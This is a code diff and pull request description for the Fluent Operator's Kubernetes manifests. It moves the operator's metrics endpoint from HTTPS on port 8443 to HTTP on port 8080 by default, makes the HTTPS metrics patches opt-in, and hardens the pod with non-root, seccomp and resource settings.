 			MustParseIntoObject(FluentdClusterOutputCustomRaw, &FluentdClusterOutputCustom)
 			MustParseIntoObject(FluentdClusterOutput2CloudWatchRaw, &FluentdClusterOutput2CloudWatch)
 			MustParseIntoObject(FluentdClusterOutput2DatadogRaw, &FluentdClusterOutput2Datadog)

--- a/config/default/kustomization.yaml
+++ b/config/default/kustomization.yaml
@@ -42,16 +42,13 @@ resources:
 # be able to communicate with the Webhook Server.
 #- ../network-policy
 
-patches:
-# [METRICS] The following patch will enable the metrics endpoint using HTTPS and the port :8443.
-# More info: https://book.kubebuilder.io/reference/metrics
-- path: manager_metrics_patch.yaml
-  target:
-    kind: Deployment
-
-# Uncomment the patches line if you enable Metrics and CertManager
-# [METRICS-WITH-CERTS] To enable metrics protected with certManager, uncomment the following line.
-# This patch will protect the metrics with certManager self-signed certs.
+# [METRICS-WITH-CERTS] To enable HTTPS metrics protected with certManager,
+# uncomment the patches below. These patches enable the endpoint and configure
+# it to use the certificate managed by certManager.
+#patches:
+#- path: manager_metrics_patch.yaml
+#  target:
+#    kind: Deployment
 #- path: cert_metrics_manager_patch.yaml
 #  target:
 #    kind: Deployment

--- a/config/default/kustomization.yaml
+++ b/config/default/kustomization.yaml
@@ -49,6 +49,9 @@ resources:
 #- path: manager_metrics_patch.yaml
 #  target:
 #    kind: Deployment
+#- path: metrics_service_patch.yaml
+#  target:
+#    kind: Service
 #- path: cert_metrics_manager_patch.yaml
 #  target:
 #    kind: Deployment

--- a/config/default/manager_metrics_patch.yaml
+++ b/config/default/manager_metrics_patch.yaml
@@ -1,4 +1,9 @@
-# This patch adds the args to allow exposing the metrics endpoint using HTTPS
-- op: add
-  path: /spec/template/spec/containers/0/args/-
-  value: --metrics-bind-address=:8443
+# This patch configures the manager to expose the metrics endpoint using HTTPS.
+- op: replace
+  path: /spec/template/spec/containers/0/args
+  value:
+    - --metrics-bind-address=:8443
+    - --metrics-secure=true
+- op: replace
+  path: /spec/template/spec/containers/0/ports/0/containerPort
+  value: 8443

--- a/config/default/metrics_service.yaml
+++ b/config/default/metrics_service.yaml
@@ -7,10 +7,10 @@ metadata:
   name: fluent-operator-metrics
 spec:
   ports:
-  - name: https
-    port: 8443
+  - name: metrics
+    port: 8080
     protocol: TCP
-    targetPort: 8443
+    targetPort: 8080
   selector:
     app.kubernetes.io/component: operator
     app.kubernetes.io/name: fluent-operator

--- a/config/default/metrics_service_patch.yaml
+++ b/config/default/metrics_service_patch.yaml
@@ -1,0 +1,7 @@
+# This patch configures the metrics Service for the optional HTTPS endpoint.
+- op: replace
+  path: /spec/ports/0/port
+  value: 8443
+- op: replace
+  path: /spec/ports/0/targetPort
+  value: 8443

--- a/config/manager/manager.yaml
+++ b/config/manager/manager.yaml
@@ -49,7 +49,9 @@ spec:
                 fieldPath: metadata.namespace
           - name: CONTAINER_LOG_PATH
             value: /var/log/containers
-        args: []
+        args:
+          - --metrics-bind-address=:8080
+          - --metrics-secure=false
         livenessProbe:
           httpGet:
             path: /healthz

--- a/config/manager/manager.yaml
+++ b/config/manager/manager.yaml
@@ -16,57 +16,67 @@ spec:
         app.kubernetes.io/component: operator
         app.kubernetes.io/name: fluent-operator
     spec:
-      securityContext:
-        runAsNonRoot: true
+      volumes:
+      - name: env
+        configMap:
+          name: fluent-operator-env
       containers:
-      - command:
-        - /manager
-        args:
-        - --leader-elect
-        - --health-probe-bind-address=:8081
+      - name: fluent-operator
         image: controller:latest
-        name: manager
-        ports:
-        - containerPort: 8081
-          name: health
-          protocol: TCP
         securityContext:
-          readOnlyRootFilesystem: true
           allowPrivilegeEscalation: false
           capabilities:
             drop:
-              - "ALL"
-        livenessProbe:
-          httpGet:
-            path: /healthz
-            port: 8081
-          initialDelaySeconds: 15
-          periodSeconds: 20
-        readinessProbe:
-          httpGet:
-            path: /readyz
-            port: 8081
-          initialDelaySeconds: 5
-          periodSeconds: 10
+            - ALL
+          readOnlyRootFilesystem: true
+          runAsGroup: 65532
+          runAsNonRoot: true
+          runAsUser: 65532
+          seccompProfile:
+            type: RuntimeDefault
+        resources:
+          limits:
+            cpu: 100m
+            memory: 60Mi
+          requests:
+            cpu: 100m
+            memory: 20Mi
         env:
           - name: NAMESPACE
             valueFrom:
               fieldRef:
                 apiVersion: v1
                 fieldPath: metadata.namespace
-        resources:
-          limits:
-            cpu: 200m
-            memory: 128Mi
-          requests:
-            cpu: 10m
-            memory: 64Mi
+          - name: CONTAINER_LOG_PATH
+            value: /var/log/containers
+        args: []
+        livenessProbe:
+          httpGet:
+            path: /healthz
+            port: 8081
+          initialDelaySeconds: 15
+          periodSeconds: 20
+          timeoutSeconds: 5
+          failureThreshold: 3
+        readinessProbe:
+          httpGet:
+            path: /readyz
+            port: 8081
+          initialDelaySeconds: 5
+          periodSeconds: 10
+          timeoutSeconds: 5
+          failureThreshold: 3
         volumeMounts:
           - name: env
             mountPath: /fluent-operator
-      volumes:
-      - name: env
-        configMap:
-          name: fluent-operator-env
+        ports:
+          - containerPort: 8080
+            name: metrics
       serviceAccountName: fluent-operator
-      terminationGracePeriodSeconds: 10
+      securityContext:
+        fsGroup: 65532
+        runAsGroup: 65532
+        runAsNonRoot: true
+        runAsUser: 65532
+        seccompProfile:
+          type: RuntimeDefault

--- a/config/network-policy/allow-metrics-traffic.yaml
+++ b/config/network-policy/allow-metrics-traffic.yaml
@@ -22,5 +22,5 @@ spec:
           matchLabels:
             metrics: enabled  # Only from namespaces with this label
       ports:
-        - port: 8443
+        - port: metrics
           protocol: TCP

--- a/config/prometheus/monitor.yaml
+++ b/config/prometheus/monitor.yaml
@@ -9,20 +9,8 @@ metadata:
 spec:
   endpoints:
     - path: /metrics
-      port: https
-      scheme: https # Ensure this is the name of the port that exposes HTTPS metrics
-      bearerTokenFile: /var/run/secrets/kubernetes.io/serviceaccount/token
-      tlsConfig:
-        # TODO(user): The option insecureSkipVerify: true is not recommended for production since it disables
-        # certificate verification. This poses a significant security risk by making the system vulnerable to
-        # man-in-the-middle attacks, where an attacker could intercept and manipulate the communication between
-        # Prometheus and the monitored services. This could lead to unauthorized access to sensitive metrics data,
-        # compromising the integrity and confidentiality of the information.
-        # Please use the following options for secure configurations:
-        # caFile: /etc/metrics-certs/ca.crt
-        # certFile: /etc/metrics-certs/tls.crt
-        # keyFile: /etc/metrics-certs/tls.key
-        insecureSkipVerify: true
+      port: metrics
+      scheme: http
   selector:
     matchLabels:
       app.kubernetes.io/component: operator

--- a/config/prometheus/monitor_tls_patch.yaml
+++ b/config/prometheus/monitor_tls_patch.yaml
@@ -1,6 +1,11 @@
-# Patch for Prometheus ServiceMonitor to enable secure TLS configuration
-# using certificates managed by cert-manager
+# Patch the ServiceMonitor to use HTTPS and certificates managed by cert-manager.
 - op: replace
+  path: /spec/endpoints/0/scheme
+  value: https
+- op: add
+  path: /spec/endpoints/0/bearerTokenFile
+  value: /var/run/secrets/kubernetes.io/serviceaccount/token
+- op: add
   path: /spec/endpoints/0/tlsConfig
   value:
     # SERVICE_NAME and SERVICE_NAMESPACE will be substituted by kustomize

--- a/manifests/setup/setup.yaml
+++ b/manifests/setup/setup.yaml
@@ -42984,10 +42984,10 @@ metadata:
   namespace: fluent
 spec:
   ports:
-  - name: https
-    port: 8443
+  - name: metrics
+    port: 8080
     protocol: TCP
-    targetPort: 8443
+    targetPort: 8080
   selector:
     app.kubernetes.io/component: operator
     app.kubernetes.io/name: fluent-operator
@@ -43012,56 +43012,65 @@ spec:
         app.kubernetes.io/name: fluent-operator
     spec:
       containers:
-      - args:
-        - --leader-elect
-        - --health-probe-bind-address=:8081
-        - --metrics-bind-address=:8443
-        command:
-        - /manager
+      - args: []
         env:
         - name: NAMESPACE
           valueFrom:
             fieldRef:
               apiVersion: v1
               fieldPath: metadata.namespace
+        - name: CONTAINER_LOG_PATH
+          value: /var/log/containers
         image: ghcr.io/fluent/fluent-operator/fluent-operator:latest
         livenessProbe:
+          failureThreshold: 3
           httpGet:
             path: /healthz
             port: 8081
           initialDelaySeconds: 15
           periodSeconds: 20
-        name: manager
+          timeoutSeconds: 5
+        name: fluent-operator
         ports:
-        - containerPort: 8081
-          name: health
-          protocol: TCP
+        - containerPort: 8080
+          name: metrics
         readinessProbe:
+          failureThreshold: 3
           httpGet:
             path: /readyz
             port: 8081
           initialDelaySeconds: 5
           periodSeconds: 10
+          timeoutSeconds: 5
         resources:
           limits:
-            cpu: 200m
-            memory: 128Mi
+            cpu: 100m
+            memory: 60Mi
           requests:
-            cpu: 10m
-            memory: 64Mi
+            cpu: 100m
+            memory: 20Mi
         securityContext:
           allowPrivilegeEscalation: false
           capabilities:
             drop:
             - ALL
           readOnlyRootFilesystem: true
+          runAsGroup: 65532
+          runAsNonRoot: true
+          runAsUser: 65532
+          seccompProfile:
+            type: RuntimeDefault
         volumeMounts:
         - mountPath: /fluent-operator
           name: env
       securityContext:
+        fsGroup: 65532
+        runAsGroup: 65532
         runAsNonRoot: true
+        runAsUser: 65532
+        seccompProfile:
+          type: RuntimeDefault
       serviceAccountName: fluent-operator
-      terminationGracePeriodSeconds: 10
       volumes:
       - configMap:
           name: fluent-operator-env

--- a/manifests/setup/setup.yaml
+++ b/manifests/setup/setup.yaml
@@ -43012,7 +43012,9 @@ spec:
         app.kubernetes.io/name: fluent-operator
     spec:
       containers:
-      - args: []
+      - args:
+        - --metrics-bind-address=:8080
+        - --metrics-secure=false
         env:
         - name: NAMESPACE
           valueFrom:


### PR DESCRIPTION
## Summary

- Switch the metrics service and container port from HTTPS `8443` to HTTP `8080`.
- Update generated setup manifests and make HTTPS metrics patches opt-in.
- Harden the operator pod with non-root security settings, seccomp, resource limits, and container log path configuration.
- Improve liveness and readiness probe settings.

## Testing

Not run (not requested).